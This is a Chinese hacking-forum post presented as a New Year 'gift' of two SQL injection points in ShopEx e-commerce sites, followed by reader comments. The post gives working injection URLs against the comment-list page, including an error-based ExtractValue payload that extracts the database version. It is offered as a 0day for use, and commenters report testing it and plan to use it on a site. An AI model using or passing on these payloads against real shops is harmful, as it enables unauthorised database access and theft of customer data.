T00ls新年礼物之二:shopex通杀SQL注入两处
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.
http://www.x.com/comment-8967'/**/and/**/ExtractValue(0x64,concat(0x01,(select/**/@@version)))/**/order/**/by/**/'1-ask-commentlist.html
http://www.x.cn/index.php?comment-822'/**/and/**/'1'='1-ask-commentlist.html
http://demo.x.com.cn/485/index.php?comment-190'/**/and/**/'1'='1-ask-commentlist.html
分为开没开伪静态以及有木有屏蔽错误回显的2X2=4种情况.
不提供技术咨询...
新年快乐.
关于作者
评论90次
娃娃终于放东西了 静悄悄这么长时间
娃仔,我是pk,最近到哪里潜心修炼去了。。。
呵。收了。暂时不知道用在何处。
目测 t00ls 又要火了
谢谢哈。。。。。
给力啊...求更多的牛放0DAY
谢谢分享。。。。~
好像伪静态注入
娃娃帐号捡回来了哇 ~~
又有EXP了
测试成功
最近淫人们都开始搞商城了。
好吧,正好碰到个SHOPEX要处理 收下了
感谢娃娃分享0day啊。求大牛分析
给力、、、
果真给力啊大牛。。。 绝对收藏。。。
真给力啊!!
强悍。